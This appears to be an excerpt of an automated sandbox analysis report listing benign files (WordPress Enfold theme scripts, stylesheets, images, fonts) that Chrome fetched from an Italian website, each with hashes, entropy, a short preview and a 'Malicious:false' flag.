                                                                                                                                              SHA-512:1DF76EFE5C250251850194B7BA944540EBA250DEC60E56B430EA0E8B4DC1E5469ACEAA3FADB2A8973A0D65783AE094F32FC10015F89E81CDD1884403AD4BEF38
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_fullscreen/slideshow_fullscreen.js?ver=6.0.9
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// Fullscreen Slideshow .// .// extends avia slideshow script with a more sophisticated preloader and fixed size for slider.// -------------------------------------------------------------------------------------------..(function($).{. "use strict";...$.AviaFullscreenSlider = function(options, slider)..{.. this.$slider .= $( slider ); .. this.$inner. .= this.$slider.find('.avia-slideshow-inner');.. this.$innerLi.= this.$inner.find('>li');.. this.$caption .= this.$inner.find('.avia-slide-wrap .caption_container');.. this.$win. .= $( window );.. this.isMobile .= $.avia_utilities.isMobile;.. this.property .= {};.. this.scrollPos.= "0";.. this.transform3d= document.documentElement.className.indexOf('avia_transform3d') !== -1 ? true : false;.. this.ticking .= false; .. .. .. if($.avia_utilities.supported.transition === undefined)...{....$.avia_utiliti
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 600 x 336, 8-bit colormap, non-interlaced
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):23657
                                                                                                                                              Entropy (8bit):7.978555300365959
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:BXhfqNQ7nJCPa0/h8Q2JYAp73MaLpp1agGr8CP7LPtU6tobSKAJBbFQ4IRbh4nYb:3fqNIJS/h8PJ5p75pp88CzL6aJXxIwn4
                                                                                                                                              MD5:E1A7115B9E551D311CE3B93BA0712954
                                                                                                                                              SHA1:DBCD1AF288506EFED5B8C3EA8C5E13F1A703D3A8
                                                                                                                                              SHA-256:F7AAFD0DC467D9B83E237AD46167AB321A395FEDE6E2B263927B4EB57255C404
                                                                                                                                              SHA-512:8A1AA5B5D70807F4C9181669FA51FE324B96C34ECA1F3894A8053917E58747B66632F0B45DFF9DFCE508A96AFF4CB7BC66613C4FEBE5A63E153F13AC39393DD1
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.PNG........IHDR...X...P.....T.......PLTELiq{I(......@..zH'{I'{I(...pI2........}L,zG%}K+.W9.[=.O0.O/..~M-.P1.......R2.U6.U6....h.|f.nU.[>.jO.^A.^A..........aE.....v.t[.fK.mS...aD~L,....qX....eJ..{.zb..}..l.X;.T6.sZ.fJ..q.}f.pV....jO.zb.....m..w.......v.........h.jO._B.V7.za{I(}G%{H&{G%}I'yE"|H't......QtRNS..........8.........$..C....CI_{..S2$F.Qmk...../.c.].8z...R..y.&..b..u.P.............pHYs.........&.:4...;tEXtComment.xr:d:DAGB_vkJXXo:2,j:2165529927534471793,t:24041006.T.G.. .IDATx..].W....@.;.H".2....q@P.@...C.......QP.....Rk.{.=b.........-miK[.....-miK[.....-miK[.....-miK[.....-miK[.....-miK[.....-miK[.....-miK[.....-miK[.....-miK[.....-miK[.....-miK[.....-miK[.....-miK[.....-miK[.....-miK[.MQ.E.0.;E...../1.!.dy.eu........%....V........@`....).....`.B:...vw....l3.........p"i....~=_:...-m.d....E.0..D8..T*..i...L.$.PH..P$..f..D^.5jh.y.u....ME.Q.%..c..........=..ry...........Z.4f..4...R..m.....(ph...K.>..!.z...D.:..g..)..7..8..Q.V[/..
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):535
                                                                                                                                              Entropy (8bit):4.99014468971863
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:t43rcgfq7NufYhzi50UJ8xufJ1RkJJvnN5uf4w7cc7Quf3dR:t43rcyMEYhW50U2xE4xE4Hc7QE3dR
                                                                                                                                              MD5:FCFEF6780B36BEF537381474DF9D0BE9
                                                                                                                                              SHA1:68B2EAD4370E7AB7B70EB6D35A09C31E73C44FD3
                                                                                                                                              SHA-256:51A8613AC1B05EAFB9486E6420336BD8B95DAE7A9D11DEF6318776A61C701A08
                                                                                                                                              SHA-512:EC21F7B6951F00F0DA0ACFDB21BBBE037DCAA2A14F2A1DE02C991F91AF689B1039720801EBB90CA900379766D5726752ED7FD85A349DB508D3F94EDECC4EC0A0
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/gb.516897fd3988e35032b7.svg
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" id="flag-icons-gb" viewBox="0 0 640 480">. <path fill="#012169" d="M0 0h640v480H0z"/>. <path fill="#FFF" d="m75 0 244 181L562 0h78v62L400 241l240 178v61h-80L320 301 81 480H0v-60l239-178L0 64V0h75z"/>. <path fill="#C8102E" d="m424 281 216 159v40L369 281h55zm-184 20 6 35L54 480H0l240-179zM640 0v3L391 191l2-44L590 0h50zM0 0l239 176h-60L0 42V0z"/>. <path fill="#FFF" d="M241 0v480h160V0H241zM0 160v160h640V160H0z"/>. <path fill="#C8102E" d="M0 193v96h640v-96H0zM273 0v480h96V0h-96z"/>.</svg>.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 75 x 74, 8-bit/color RGB, non-interlaced
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):28207
                                                                                                                                              Entropy (8bit):5.4008387140017
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:/JN9NvO3tT508SkWARqtMJEOJaFekr3jhVe5Wz:BN9Nv4t2hkP6OwZ3jhh
                                                                                                                                              MD5:E6B2EFBE08AD337A88FC61DB5A933523
                                                                                                                                              SHA1:5DCA2862DD84D3F699EBC0DB5123A1852D2752CB
                                                                                                                                              SHA-256:9D212738DCE90AC9B477D86929CA0FA08B4453EB7AB9868E24040B3200612A29
                                                                                                                                              SHA-512:D1B67DEC88C1EA0C71567849EC9C2106C34831AE24D8C2B16A8F6E83F361B64A5BDDE62EFBCAC71198CE7F12EA5AAA47A85B4EFAE4CC9178A5391617064BD8F1
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/uploads/2019/06/3.png
                                                                                                                                              Preview:.PNG........IHDR...K...J.....|p>.....pHYs.................iCCPPhotoshop ICC profile..x..wT.Y.......-!.RBo....k...FH ...B.......X...eDFD... cA,X..{..AE]..6T....{v..=g.s.9..{........Nr.R1...-..b...I.)l.. .......\.ott8...p.....6\.T..[...sy.H4...sy...1...'....$.0^*......`..S..-...Lr=.0.&............D.re...].`...r..'....E.....x.\>.M........h..`..O>...LSzr..%O......Q.T.].....+..0...P....$..&kI..%i.QS,.O......!.S...O.b>7 l..Y.S.M...9qS,[.....#....%....Nq.(.3....)..%DNqnVl......S.({..)g.....K...Q.....G...#..)}......J=7/VyV..S....i.h.."..<y.29.....r.H ..}.Rq:.#...b;...$%..'......@XW...N....D0.q..N<.`|.........)dy.......P.&h.>.....8...@ .B..A2,...!.d...`..C)l..P......!8.mp...E..}p......K...0. ...#.D.1@L.k..qE..@$..A..TD.H..R..CJ.2...4"."'...e....."#.[....4...f.l...E..8t!*@s.|...V.u.A..=.^Eo...Kt.....0C..s...(,...d.*.....f....n`..+.3..c..8.........rp.p.qU...V.y... n...O.....x.>././...+..............E0'..B..L...F..B....O."...Dm.5..E....b.N.A...u.0...J2 9..H)$.i-..t.t.t
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):614
                                                                                                                                              Entropy (8bit):4.966361742203004
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:9gGJJvPVimIt8zEaOWmlU1VwNcTXVElHLQmfKoMijyAvV+Y3XnTNfXmDH:999VimItHaOWX1GcTXCEz2ywXnpfOH
                                                                                                                                              MD5:9F0550AA2AF3E92B68101D207A65F9DD
                                                                                                                                              SHA1:DA64F09724EBA9F2EE89FFAFBA588625574CD7E2
                                                                                                                                              SHA-256:3CF7C0660C3BC7472D44B915CB0315D4E34D616AB229DFD3CEB7AECB2BDC5B1D
                                                                                                                                              SHA-512:92260F5B392C4FB13D7ECD162D48BE12C60E7E430CF0C2386472CA460565CDB30967F3DCFB9FA91F5B0CB29C5395826883EBC38054CDC2C877AEED9CB3334389
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-wpml/wpml-mod.js?ver=4.5
                                                                                                                                              Preview:.(function($).{.. "use strict";....$(document).ready(function()..{. .../**... * Remove Themes duplicated language switcher flags from Burger menu... *..- exist in secondary menu... *..- exist beside search icon... */...$('body').on( 'avia_burger_list_created', '.av-burger-menu-main a', function(){....var s = $(this);.........//.allow DOM to build....setTimeout(function(){.....var switchers = s.closest('.avia-menu.av-main-nav-wrap').find('.av-burger-overlay').find('.language_flag');.....switchers.each( function(){........$(this).closest('li').remove();......});.....}, 200);...});..});.....})( jQuery );.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1252
                                                                                                                                              Entropy (8bit):4.473635870451384
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:lmlqlADyM91w31nd9QBHPUOzedXFgz6I5BsTEEEaPeC:4lCA+C16d9QBHPUPdX3I5cmC
                                                                                                                                              MD5:73432D98D2FDC996AB54405886D3C2FB
                                                                                                                                              SHA1:B885B6FB83B2C0369617C01548D6A8771DB55F33
                                                                                                                                              SHA-256:10C8050275A788952F68E6FF1AB42F63A6C1D2D0FD2C9CCAFE5F2964F980C78E
                                                                                                                                              SHA-512:CE4BC743F57EFA91327A2061D79637A22F81AF02DD17428C0D2CF0410A83D83BBB26FADCA093CFBC48CB93015096509E61CA50DF1911C58E225BD99387438B1B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/social_share/social_share.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Share Box.====================================================================================================================================================== */...av-share-box{width:100%; clear:both; float:left; font-size: 13px; margin-top:30px; margin-bottom:-50px; padding:0;}..av-share-box .av-share-link-description{margin-bottom: 20px;}.#top .av-share-box ul{margin:0; padding:0; list-style-type: none; overflow: hidden; border-style: solid; border-width: 1px; display: table; width:100%; text-align: center; table-layout: fixed; border-radius: 3px; background: transparent; }..av-share-box ul li{margin:0; padding:0; display: table-cell; border-left-style: solid; border-left-width:1px;}..av-share-box ul li:first-child{border:none;}..av-share-box ul li a{ display:block; padding:15px 0; text-decoration: none; color: inherit; font-size:
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 1222 x 630, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1154939
                                                                                                                                              Entropy (8bit):7.994249005289387
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:24576:c8DSUtnAe2ZXyEUKmz+seDswaYnUjKTPVlUw0Rokwe0xCAvok7r0:c8X52UKm+nDs4UGTj+WReSr0
                                                                                                                                              MD5:C4FEE7CC5FCC8374EEC1346D5039BCB2
                                                                                                                                              SHA1:EDA5C05F49067283691F7C1895A4586078562A14
                                                                                                                                              SHA-256:C0A28F129EB09E57E7A1030459A3304BEEE49258324A11F6522517D6C5A6EF7A
                                                                                                                                              SHA-512:162362389A1D06755A02C6A255664BA39665FBBFF200C89B74B924E28593A9C48F26A1BDB91CDD44915633CA29EA9263C8E8538458F6A549DFF908CAB2ED29D5
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/uploads/2024/08/Schermata-2024-08-29-alle-09.25.53-1222x630.png
                                                                                                                                              Preview:.PNG........IHDR.......v.............IDATx..Y.&[r..-...g..;.[.P..@....d.h&S.M.6.......,..d&....ZjC..h.. .bF.5.............,^.E..<...;.v_..9.....B..........(.......~.......QU...g.^S....y.a@....3.[....{!.L....P..e..?._..O....Z......__...K......]d..t....D5.>...>L.3^Ce~...WU...v...k..=..ko.>..../..6..+_..`.X.V.i......7....[...^.H..%Pi..>....}.....^..{..._h..g.m.L.O....nk#...._.x.$.......j{..-.x...Z..O..)...}...ul..D).".X..+E.{.......?~i.g.>.....=..p..d..n;.z........^.QJ.0...........}JUQ.B.Q..Z...#.......D...\[;Edz.DPtZg.u.^.k.H.0...L.x..:}n(...#E......V...V..$.>........e(.J..K.vA..G.........A..H..Z..tm*.{L./.....L"i."=..g./.I....z&.......9y_...W:.U..[..\;..%.}.....]{......=.......V..Uk..P.......s(.5)e..".}.84l...j.\.....]..2=.eZ...i?P....Y\c.....Um.y....C.E.i...4..2.v.~?.t1 ".5.._..e{=.x#.Ge......B.....{..`.YA.....w..o....n.o..._........7........~..~.....xz....].......i...+Q.....U.{.~F.....~>m-..@.N....6k.EWU...hK..N...L{..{.g....
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (36994), with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):36994
                                                                                                                                              Entropy (8bit):5.231190304828876
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:qHxbLj7qlNojIO+9CLVWWOd8LqGt7Zen5nysGqR4iXiq1GIQxJOEF7TwpPZIL4UY:9NojTDzJSitOTT
                                                                                                                                              MD5:DB6B7A89CFFD08FF887132AA538F47E9
                                                                                                                                              SHA1:CAD3129C71535BAAAB25AC06D8429734959B0B3F
                                                                                                                                              SHA-256:C1E8450E0DD30BB40A178A67B82BBDA805668BA777D0C8040941CE88D5056F4E
                                                                                                                                              SHA-512:4E24B7FC8453474AA89E434EAA23005086901870CE3C883D2D213FDF370A3E6200DBDDF2703FBA9227152F1CD440660569A7D1CC652E956373B8333E9E4AE3D8
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[2],{2:function(e,t,n){e.exports=n("hN/g")},"hN/g":function(e,t,n){"use strict";n.r(t),n("pDpN")},pDpN:function(e,t,n){var o,r;void 0===(r="function"==typeof(o=function(){"use strict";!function(e){const t=e.performance;function n(e){t&&t.mark&&t.mark(e)}function o(e,n){t&&t.measure&&t.measure(e,n)}n("Zone");const r=e.__Zone_symbol_prefix||"__zone_symbol__";function s(e){return r+e}const a=!0===e[s("forceDuplicateZoneCheck")];if(e.Zone){if(a||"function"!=typeof e.Zone.__symbol__)throw new Error("Zone already loaded.");return e.Zone}class i{constructor(e,t){this._parent=e,this._name=t?t.name||"unnamed":"<root>",this._properties=t&&t.properties||{},this._zoneDelegate=new l(this,this._parent&&this._parent._zoneDelegate,t)}static assertZonePatched(){if(e.Promise!==C.ZoneAwarePromise)throw new Error("Zone.js has detected that ZoneAwarePromise `(window|global).Promise` has been overwritten.\nMost likely cause is that a Promise polyfill has b
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):11409
                                                                                                                                              Entropy (8bit):4.883982385160355
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:mLvIhQIf7L7qyxhkqOLwU+BMCSdipHbh/sHW2t:d7YwU14CWK
                                                                                                                                              MD5:3C24FA8B7479769FC1CCC5F77BE95B66
                                                                                                                                              SHA1:3DF5C8561476B3EBE2338334D0E0AA14A8EADE82
                                                                                                                                              SHA-256:A3B3A5A471B2D41CF340D47E3BBE21E481FDC3A15D5E838309596877832723A1
                                                                                                                                              SHA-512:6E3AB9D45A6A7A3161B45E62F5633DBA069C6919AD84E4BE15E8153231BEB83C11382911A68826E61A8B21031970D0455FBE70A9C4CF7D413CB05A93DFF1B622
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// Avia AJAX Portfolio.// -------------------------------------------------------------------------------------------..(function($).{ .."use strict";..$.avia_utilities = $.avia_utilities || {};......// -------------------------------------------------------------------------------------------..//Portfolio sorting..// -------------------------------------------------------------------------------------------.. $.fn.avia_iso_sort = function(options)..{...return this.each(function()...{....var the_body..= $('body'),.....container..= $(this),.....portfolio_id.= container.data('portfolio-id'),.....parentContainer.= container.parents('.entry-content-wrapper, .avia-fullwidth-portfolio'),.....filter...= parentContainer.find('.sort_width_container[data-portfolio-id="' + portfolio_id + '"]').find('#js_sort_items').css({visibility:"visible", opacity:0}),.....links...= filter.find('a'),.....imgParent.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):7868
                                                                                                                                              Entropy (8bit):5.466903100422613
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:czJMqnHCPCYMCar5QkAZ6p/dp4qp0npu3pe/v4i09uNk:c5iKOY5ntdqqunGAAv5
                                                                                                                                              MD5:94F736A0E1933EDB22FAF1A6E78F6953
                                                                                                                                              SHA1:33110EC3100ACF7EC69EB4F5EAC2C1299324717F
                                                                                                                                              SHA-256:7F28CEEFD9A37226662E8D81B528E18B475E71EE6FB222814AE5C6A4D91F2895
                                                                                                                                              SHA-512:C5457CD2A523B715CF3974536FF5D400F1C4C57B003E162B41B80DBAA5CFC4D5C6707AA0C9DBEBD6D253EFDB9D4234A4069CFF878AB0E573E296B4AB1B4A2D2F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://fonts.googleapis.com/css2?display=swap&family=Raleway:wght@100;500&family=Dosis:wght@500&family=Dancing+Script&family=Fjalla+One
                                                                                                                                              Preview:/* vietnamese */.@font-face {. font-family: 'Dancing Script';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/dancingscript/v25/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3Rep8ltA.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-face {. font-family: 'Dancing Script';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/dancingscript/v25/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3ROp8ltA.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Dancing Script';. font-style: normal;. font-weight
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):2497
                                                                                                                                              Entropy (8bit):4.843621206511125
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:EB+VRkUlcs7bFfAeJLyfrlyQMMKXiFvJ+JemNpSDYi6R:EBeqyckbFoceJyQuX+hapSkrR
                                                                                                                                              MD5:A0B3B46931A88E9397C2E22AD93460AC
                                                                                                                                              SHA1:92169E8FA68C8EC06EB571EA4A89D22D5E604E70
                                                                                                                                              SHA-256:F3BE56D8AC58697106341FFE67BABAAFB18D3E6A2FAD673E9D4FE8347AB01195
                                                                                                                                              SHA-512:F657EF638F00648C94BA40D71597FF27064ADD39EB8B411C1266C7774A20B9DFA5C9566D0B8D3626D13526A2E8402A3A7E121D6A8525965C2244B0D1CF1A2744
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery/gallery.js?ver=6.0.9
                                                                                                                                              Preview:(function($).{ .."use strict";....// -------------------------------------------------------------------------------------------..// Gallery shortcode javascript..// -------------------------------------------------------------------------------------------....$.fn.avia_sc_gallery = function(options)..{...return this.each(function()...{....var gallery = $(this), images = gallery.find('img'), big_prev = gallery.find('.avia-gallery-big');........//trigger displaying of thumbnails....gallery.on('avia_start_animation', function()....{.....images.each(function(i).....{......var image = $(this);......setTimeout(function(){ image.addClass('avia_start_animation') }, (i * 110));.....});....});........if(gallery.hasClass('deactivate_avia_lazyload')) gallery.trigger('avia_start_animation');......//trigger thumbnail hover and big prev image change....if(big_prev.length)....{.....gallery.on('mouseenter','.avia-gallery-thumb a', function().....{......var _self = this;........big_prev.attr('data-oncl
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 1222 x 630, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1154939
                                                                                                                                              Entropy (8bit):7.994249005289387
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:24576:c8DSUtnAe2ZXyEUKmz+seDswaYnUjKTPVlUw0Rokwe0xCAvok7r0:c8X52UKm+nDs4UGTj+WReSr0
                                                                                                                                              MD5:C4FEE7CC5FCC8374EEC1346D5039BCB2
                                                                                                                                              SHA1:EDA5C05F49067283691F7C1895A4586078562A14
                                                                                                                                              SHA-256:C0A28F129EB09E57E7A1030459A3304BEEE49258324A11F6522517D6C5A6EF7A
                                                                                                                                              SHA-512:162362389A1D06755A02C6A255664BA39665FBBFF200C89B74B924E28593A9C48F26A1BDB91CDD44915633CA29EA9263C8E8538458F6A549DFF908CAB2ED29D5
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.PNG........IHDR.......v.............IDATx..Y.&[r..-...g..;.[.P..@....d.h&S.M.6.......,..d&....ZjC..h.. .bF.5.............,^.E..<...;.v_..9.....B..........(.......~.......QU...g.^S....y.a@....3.[....{!.L....P..e..?._..O....Z......__...K......]d..t....D5.>...>L.3^Ce~...WU...v...k..=..ko.>..../..6..+_..`.X.V.i......7....[...^.H..%Pi..>....}.....^..{..._h..g.m.L.O....nk#...._.x.$.......j{..-.x...Z..O..)...}...ul..D).".X..+E.{.......?~i.g.>.....=..p..d..n;.z........^.QJ.0...........}JUQ.B.Q..Z...#.......D...\[;Edz.DPtZg.u.^.k.H.0...L.x..:}n(...#E......V...V..$.>........e(.J..K.vA..G.........A..H..Z..tm*.{L./.....L"i."=..g./.I....z&.......9y_...W:.U..[..\;..%.}.....]{......=.......V..Uk..P.......s(.5)e..".}.84l...j.\.....]..2=.eZ...i?P....Y\c.....Um.y....C.E.i...4..2.v.~?.t1 ".5.._..e{=.x#.Ge......B.....{..`.YA.....w..o....n.o..._........7........~..~.....xz....].......i...+Q.....U.{.~F.....~>m-..@.N....6k.EWU...hK..N...L{..{.g....
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):7718
                                                                                                                                              Entropy (8bit):5.325025374288068
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:y5z9Mwaa9thN9E9mBNpEpmY7NTFETFmTbyw9dSEeEOvSxexO/SrXADerXADOrXJn:Ap1Tj
                                                                                                                                              MD5:52841883BF30CD08C45DBFDD0CB68D22
                                                                                                                                              SHA1:81F9EACAAD32839B2FB1D8312A21FF173D4C35E0
                                                                                                                                              SHA-256:C358F663FCD1449E211B160F68AEC5E6801BA95DD08255D29D2815A05CD80A21
                                                                                                                                              SHA-512:105837CAEBDBD36AA68F60FAEF63166456ADDC1E9262B76474B8219665AF11533CA527C32F41428767E0070229C009A357A8F22423D1320EF5695CCE16E71C0F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/progressbar/progressbar.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Progress Bar.====================================================================================================================================================== */..avia-progress-bar-container{margin: 15px 0; clear:both;}..avia-progress-bar{position: relative; margin-bottom:4px;}..avia-progress-bar .progressbar-title-wrap {.position: absolute;.z-index: 2;.bottom: 3px;.left: 3px;.color: white;.background: black;.background: rgba(0, 0, 0, 0.5);.padding: 1px 10px 2px 10px;.border-radius: 3px;.line-height: 21px;.}..progressbar-icon{float:left;margin-right:5px;}..icon-bar-no .progressbar-icon{display:none;}..progressbar-title{float:left;}..avia-progress-bar .progress{width:100%; height:30px; line-height: 30px; position: relative; border-radius: 3px; overflow: hidden;.box-shadow: inset 0px 0px 15px 0px rgba(0, 0, 0, 0.07);.}..#top .avia-
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):2717
                                                                                                                                              Entropy (8bit):4.838210252869189
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:HscTPfCveCf5EfIQ624+TR1sJ9l6ja9k4yDA9d6kJmI8Y:HfTivIam1yYGFp2Y
                                                                                                                                              MD5:80A0FA2CF547E1606BC84512ACD3CF9F
                                                                                                                                              SHA1:34C75C93C017463394ED90823A1B2953F5103762
                                                                                                                                              SHA-256:A9D48461F7979E1008843762ECBDA5C84701EB23504C16235A1D939F2CEF7B4E
                                                                                                                                              SHA-512:F534408A98C2767932650E7E3CDA9B097FF217C029E145DB9DEB701AEFB413592B505A55AEB875389659705DFE1AB5E60463C66A42F69958394E6C8B5776AFC0
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/contentslider/contentslider.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Partner/Logo Slider + Content Slider.====================================================================================================================================================== */../*shared styles*/.#top .avia-smallarrow-slider {position: relative; overflow: visible;}.#top .avia-smallarrow-slider .avia-slideshow-arrows {position: relative; width:51px; top:-3px; left:0; height: 24px;}.#top .avia-smallarrow-slider .avia-slideshow-arrows a{opacity: 1; margin:0; width:24px; height:24px; line-height: 25px; font-size: 10px; top:0;}.#top .avia-smallarrow-slider .avia-slideshow-arrows a:hover{opacity: 0.5;}.#top .avia-smallarrow-slider .avia-slideshow-arrows a:before{line-height: 25px; border-radius: 1px;}.#top .avia-smallarrow-slider .slide-image, #top .avia-logo-element-container img{margin:0 auto; display: block; width:aut
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):5651
                                                                                                                                              Entropy (8bit):5.0226623981085785
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:7ZS7CyVhKmW+RLHKjaqaEK6a6KKjlKacRCcq0XP4CcMsn4:7ZS7CAfbLqA4s/RCiP4CcMsn4
                                                                                                                                              MD5:31233D1BEBA5D4FC51C8420D400B64A7
                                                                                                                                              SHA1:67F0F7E55596A5C45443EBC8C33184C84487F29B
                                                                                                                                              SHA-256:E9CB274CB6C6BD4D215C727A9098EB7CA09C0421A954A9297D104A7801C30503
                                                                                                                                              SHA-512:C5C47D971EC1AEFFB994862A2C5A4659BEA7C9C47137381DC648867788517E4B9ADA5503FBC145C4A8D2037C9802056546C3FC8292AC66C1396F9D59D0388853
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_fullsize/slideshow_fullsize.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Slideshow Fullwidth.====================================================================================================================================================== */..avia-slideshow-inner li{.-webkit-transform-style: preserve-3d; /*fixes flickering issue when slider moves. usually other elements in other container flicker */.}....avia-fullwidth-slider {.border-top-style: solid;.border-top-width:1px;.z-index: 1;.}...avia-fullwidth-slider.avia-builder-el-0{border-top:none;}..div.slider-not-first, .html_header_transparency #top .avia-builder-el-0{border-top:none;}...avia-slide-wrap{.position: relative;.display: block;.}...avia-slide-wrap>p{margin:0; padding:0;}..av_slideshow_full.avia-slideshow{margin:0;}.#top .av_slideshow_full.av-control-default .avia-slideshow-arrows a{.margin:-50px 0 0 0;.width:35px;.text-align: center;.heigh
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):302
                                                                                                                                              Entropy (8bit):4.769147194204528
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:YITi5idYhzOJQf0CDMe2JTAHY/2bQcrBYOmVqaf5EgJZ54wLzjs0:YIUi6CesCTuiYu2OepEgJZ54G
                                                                                                                                              MD5:0459493E34368F890B0D2F1391A5679D
                                                                                                                                              SHA1:395D0371197A70C2C1C0A3BB61EE2B5388BD4006
